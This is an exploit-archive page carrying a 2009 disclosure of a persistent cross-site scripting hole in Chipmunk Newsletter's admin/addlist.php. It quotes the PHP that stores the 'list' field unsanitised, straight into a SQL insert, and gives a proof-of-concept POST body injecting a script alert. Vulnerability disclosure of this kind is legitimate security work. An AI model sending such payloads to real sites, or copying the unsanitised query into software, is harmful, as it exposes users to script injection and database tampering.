Lucene search
Mr_me1337DAY-ID-10117HistoryDec 07, 2009 - 12:00 a.m.
Chipmunk Newsletter Persistant XSS Vulnerability
2009-12-0700:00:00
mr_me
0day.today
12
Exploit for unknown platform in category web applications
================================================
Chipmunk Newsletter Persistant XSS Vulnerability
================================================
#################################################################
#
# Tested On: Windows Vista
# Note: For educational purposes only
#
#################################################################
ThereΓ’β¬β’s probably a lot more vulnerabilities in their web apps, but
I could not even get them to work out of the box..
http://server/newsletter/admin/addlist.php
Look no sanitization:
8<-------snip---------8<
if(isset($_POST['submit']))
{
$list=$_POST['list'];
if(strlen($list)<1)
{
print "You did not enter the name of the email list.";
}
else
{
$addemail="Insert into m_newsletters(newslettername) values('$list')";
mysql_query($addemail) or die("Could not add list");
print "List added.";
}
8<-------snip---------8<
POC POST request:
list=<script>alert('i could get your cookie')</script>&submit=submit
# 0day.today [2018-03-20] #